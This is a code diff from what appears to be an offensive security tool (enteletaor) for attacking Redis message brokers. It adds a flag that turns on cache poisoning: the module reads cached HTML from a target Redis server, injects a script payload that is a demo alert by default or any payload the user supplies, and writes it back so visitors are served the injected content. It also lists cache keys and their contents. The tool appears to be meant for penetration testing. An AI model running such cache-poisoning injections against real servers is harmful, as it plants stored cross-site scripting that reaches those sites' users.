add: new options for redis cache attack

enteletaor_lib/modules/redis/__init__.py

@@ -9,7 +9,7 @@ from libs.core.structs import CommonData
 from .redis_dump import action_redis_dump
 from .redis_shell import action_redis_shell
 from .redis_info import action_redis_server_info
-from .redis_poison import action_redis_cache_poison
+from .redis_cache import action_redis_cache_poison
 from .redis_discover_db import action_redis_discover_dbs
 from .redis_clients import action_redis_server_connected
 from .redis_disconnect import action_redis_server_disconnect

enteletaor_lib/modules/redis/cmd_actions.py

@@ -34,6 +34,8 @@ def parser_redis_server_cache_poison(parser):
 	                help="try to poisoning using selected key")
 
 	payload = parser.add_argument_group("payloads options")
+	payload.add_argument("-P", "--poison", action="store_true", dest="poison", default=False,
+	                     help="enables cache poisoning")
 	payload.add_argument("--payload", action="store", dest="poison_payload",
 	                     help="try inject cmd inline payload")
 	payload.add_argument("--file-payload", action="store", dest="poison_payload_file",

enteletaor_lib/modules/redis/redis_cache.py

@@ -97,7 +97,7 @@ def handle_html(config, content):
 		elif config.poison_payload:
 			payload = etree.fromstring(config.poison_payload)
 		else:
-			payload = "<script>alert('You're broker injection vulnerable')</script>"
+			payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
 
 		insert_point.addnext(payload)
 
@@ -145,6 +145,11 @@ def action_redis_cache_poison(config):
 		# Stop
 		return
 
+	if config.poison is True:
+		log.error("  - Poisoning enabled")
+	else:
+		log.error("  - Listing cache information:")
+
 	# --------------------------------------------------------------------------
 	# Explode caches
 	# --------------------------------------------------------------------------
@@ -159,25 +164,31 @@ def action_redis_cache_poison(config):
 		# --------------------------------------------------------------------------
 		# Make actions over cache
 		# --------------------------------------------------------------------------
+		# Poison is enabled?
+		if config.poison is True:
+			# Set injection
+			try:
+				modified = handle_html(config, content)
+			except ValueError as e:
+				log.error("  - Can't modify cache content: " % e)
+				continue
+			except IOError as e:
+				log.error("  - Can't modify cache content: " % e)
 
-		# Set injection
-		try:
-			modified = handle_html(config, content)
-		except ValueError as e:
-			log.error("  - Can't modify cache content: " % e)
-			continue
-		except IOError as e:
-			log.error("  - Can't modify cache content: " % e)
+			# Injection was successful?
+			if modified is None:
+				log.warning("  - Can't modify content: ensure that content is HTML")
+				continue
 
-		# Injection was successful?
-		if modified is None:
-			log.warning("  - Can't modify content: ensure that content is HTML")
-			continue
+			# Set injection into server
+			con.setex(val, 200, modified)
 
-		# Set injection into server
-		con.setex(val, 200, modified)
+			log.error("  - Poisoned cache key '%s' at server '%s'" % (val, config.target))
+		else:
 
-		log.error("  - Poisoned cache key '%s' at server '%s'" % (val, config.target))
+			# If not poison enabled display cache keys
+			log.error("    -> Key: '%s' - " % val)
+			log.error("    -> Content:\n %s" % content)
 
 	if not cache_keys:
 		log.error("  - No cache keys found in server: Can't poison remote cache.")